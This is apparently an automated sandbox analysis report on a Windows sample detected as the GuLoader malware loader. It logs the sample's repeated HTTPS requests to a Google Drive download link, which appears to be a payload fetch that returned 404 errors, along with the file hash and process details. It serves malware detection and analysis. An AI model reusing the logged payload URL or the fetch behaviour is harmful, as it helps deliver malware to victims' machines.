                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.749701142.250.186.334435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:19 UTC470OUTGET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:20 UTC1541INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AKDAyIuh8d4IxsahtBDulJIJUSV10pzpx9aHnPcYr3akotYsTSOHLWUTqGzS2NwvfK03v1cCf1L3s4o
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:19 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-l6Yq4-dlVyNMyk38gf7kFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-03-07 22:31:20 UTC1541INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 6b 62 7a 79 4a 6a 39 4a 4c 2d 67 4f 54 76 69 49 63 75 45 46 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ikbzyJj9JL-gOTviIcuEFQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                    2025-03-07 22:31:20 UTC111INData Raw: 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                    Data Ascii: ts an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.749702142.250.186.1424435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:22 UTC428OUTGET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:22 UTC1610INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:22 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-_OAVgV4Cjg_mjB4oyMpTWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.749703142.250.186.334435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:24 UTC470OUTGET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:25 UTC1534INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AKDAyIvP2mWS-gA7B2nPZTthVzqnPON3zlfMYzwBreymPs1qVqBUrhJJXEGjAHTf6uziTT9A
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:25 GMT
                                                    Content-Security-Policy: script-src 'nonce-8JXjsLOtQcaE-a5GZy5cfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-03-07 22:31:25 UTC1534INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 49 7a 5a 32 73 55 7a 43 46 62 4b 48 4a 74 77 62 47 75 51 5a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SIzZ2sUzCFbKHJtwbGuQZg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                    2025-03-07 22:31:25 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                    Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.749704142.250.186.1424435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:27 UTC428OUTGET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:28 UTC1610INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:27 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: script-src 'nonce-6KX4KtiqC2HgvWdidLFj7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.749705142.250.186.334435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:31:30 UTC470OUTGET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:31:31 UTC1533INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AKDAyIs7RxfqreYUG378MAxOim2ID4tJU15JrPMAQkBMZ4r_3Henu5cGEnt9yjB0d9HjIZU
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:31:30 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-GKKicmN9elSftuETiB6X7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-03-07 22:31:31 UTC1533INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 6c 55 44 51 65 4f 4a 66 6b 62 43 76 56 48 68 57 4f 67 79 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jlUDQeOJfkbCvVHhWOgyiA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                    2025-03-07 22:31:31 UTC119INData Raw: 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                    Data Ascii: <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:17:29:24
                                                    Start date:07/03/2025
                                                    Path:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\MNLS4PjscF.exe"
                                                    Imagebase:0x400000
                                                    File size:883'660 bytes
                                                    MD5 hash:7730242B95171F0CCB03E28BF8F5056B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1551650221.000000000A349000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:17:30:31
                                                    Start date:07/03/2025
                                                    Path:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\MNLS4PjscF.exe"
                                                    Imagebase:0x400000
                                                    File size:883'660 bytes
                                                    MD5 hash:7730242B95171F0CCB03E28BF8F5056B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    Reset < >